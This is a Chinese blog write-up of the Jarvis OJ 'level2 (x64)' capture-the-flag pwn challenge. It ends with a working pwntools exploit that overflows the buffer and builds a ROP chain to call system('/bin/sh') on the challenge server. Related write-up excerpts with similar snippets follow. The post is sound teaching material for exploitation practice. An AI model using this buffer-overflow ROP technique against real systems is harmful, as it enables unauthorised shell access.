Jarvis oj level2 (x64) wp

最新推荐文章于 2024-07-05 00:58:41 发布
最新推荐文章于 2024-07-05 00:58:41 发布
阅读量294 收藏
点赞数
分类专栏: pwn Jarvis OJ pwn题目 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43394612/article/details/85850326
版权

64位程序前6个参数通过寄存器来传递,多于6个的使用堆栈传递。前6个从左到右依次为RDI,RSI,RDX,RCX,R8,R9。多于六个的从右往左依次压入堆栈

拿到题目检查保护:
在这里插入图片描述
放ida里,还是之前一样的程序:
在这里插入图片描述
程序本身有字符串/bin/sh
在这里插入图片描述
找下pop rdi ret 在哪:
在这里插入图片描述
编写exp:

from pwn import*
  
a=remote("pwn2.jarvisoj.com","9882")

elf=ELF("level2_x64")

system_addr=elf.symbols["system"]

a.recvuntil("\n")

pop_rdi_ret=0x00000000004006b3

bin_sh=0x0000000000600A90

payload='A'*136

payload += p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)

a.sendline(payload)

a.interactive()
dittozzz
关注
专栏目录
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1442
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
Jarvis OJ --level4
Kni9hT's Blog
11-11 250
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
Jarvis oj level2 wp
ditto的博客
12-30 1208
检查防护 开启了NX,没开启PIE和canary防护,程序本身的基址不变。 放IDA里看一下 程序本身调用了system函数,那么PLT表里就一定有这个函数。 看下vulner函数 很显然栈溢出。 IDA查找下字符串: 发现了/bin/sh字符串,而且在本身程序的data段,由于没有开启PIE,那么这个字符串的首地址是不会变的。 简单计算下,首地址是0x0804A024, 算下溢出点是多...
【BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 416
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
jarvisoj_level2_x64
zip471642048的博客
06-24 579
题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp
jarvisoj pwn level5 wp
zszcr的博客
03-26 1966
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
JarvisOJ Web&Reverse&Pwn
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 377
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1331
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
JarvisOJ level2x64
PLpa的博客
07-09 531
这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64言: 首先,我们先看一下x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的六个参...
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 374
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
Jarvis OJ [XMAN]level2
九层台
07-06 334
查询保护 liu@liu-F117-F:~/桌面/oj/level2$ checksec level2 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2/level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1078
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
jarvisoj-level2
qq_35661990的博客
11-09 1382
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
jarvisoj_level2
m0sway的博客
03-20 902
jarvisoj_level2 WriteUP BUU_PWN
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值